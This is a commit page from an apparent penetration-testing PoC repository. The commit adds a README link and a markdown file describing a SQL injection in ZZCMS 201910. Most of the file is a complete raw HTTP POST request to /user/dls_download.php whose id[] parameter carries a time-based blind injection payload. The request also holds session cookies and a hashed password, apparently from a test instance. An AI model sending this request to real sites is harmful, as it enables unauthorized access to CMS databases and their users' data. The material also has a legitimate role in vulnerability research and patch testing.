admin/Penetration_Testing_POC
1
0
Fork 0
mirror of https://github.com/Mr-xn/Penetration_Testing_POC.git synced 2025-06-20 01:40:29 +00:00
Code Issues Packages Projects Releases Wiki Activity

add zzcms201910 sql注入

Browse Source
This commit is contained in:
mr-xn 2020-01-02 19:33:38 +08:00
parent 3eadbfaee8
commit 6a2c9c9e72
2 changed files with 31 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
README.md
View File

@ -98,7 +98,7 @@
- [CVE-2019-2107-Android播放视频-RCE-POC(Android 7.0版本7.1.1版本7.1.2版本8.0版本8.1版本9.0版本)](https://github.com/marcinguy/CVE-2019-2107)
- [CVE-2019-19844-Django重置密码漏洞(受影响版本:Django master branch,Django 3.0,Django 2.2,Django 1.11)](https://github.com/ryu22e/django_cve_2019_19844_poc/)
- [CVE-2019-17556-unsafe-deserialization-in-apache-olingo(Apache Olingo反序列化漏洞影响: 4.0.0版本至4.6.0版本)](https://medium.com/bugbountywriteup/cve-2019-17556-unsafe-deserialization-in-apache-olingo-8ebb41b66817)
-
- [ZZCMS201910 SQL Injections](./ZZCMS201910%20SQL%20Injections.md)
## 提权辅助相关

30
ZZCMS201910 SQL Injections.md Normal file
View File

@ -0,0 +1,30 @@
## ZZCMS201910 SQL Injections SQL注入
> 前提是你有一个具有购买权限的VIP会员账户
> 不然会提示:`"您所在的用户组没有下载此信息的权限!<br><input type=button value=升级成VIP会员 onclick=\"location.href='/one/vipuser.php'\"/>"`
### 注入点 ` user/dls_download with parameter $id`
### 利用POC如下
```raw
POST /user/dls_download.php HTTP/1.1
Host: test.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
Origin: http://test.com
Connection: close
Referer: http://test.com/user/advzt_manage.php
Cookie: Hm_lvt_f6f37dc3416ca514857b78d0b158037e=1576564072; Hm_lvt_520556228c0113270c0c772027905838=1576734687,1577071433; app_href_source=myapp/free; PHPSESSID=f0fb73cc2f2d41d2a3b1edb7340841a3; arrlanguage=metinfo; Hm_lpvt_520556228c0113270c0c772027905838=1577672843; acc_auth=4b90lwFZZGUdz47dUybObYz1MoB612Tg7bCn10U0P4BKoY%2FR9nnvQapvPIBF%2BB4w11KPOWCNH%2FLvwx9rH7424ZH0; acc_key=eXM7G4F; __tins__713776=%7B%22sid%22%3A%201577775703119%2C%20%22vd%22%3A%201%2C%20%22expires%22%3A%201577777503119%7D; __51cke__=; __51laig__=28; bdshare_firstime=1577771760963; UserName=test; PassWord=4297f44b13955235245b2497399d7a93
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
id[]=1&id[]=2)%0aor%0asleep(5)%23&FileExt=xxx
```
来源与https://github.com/JcQSteven/blog/issues/15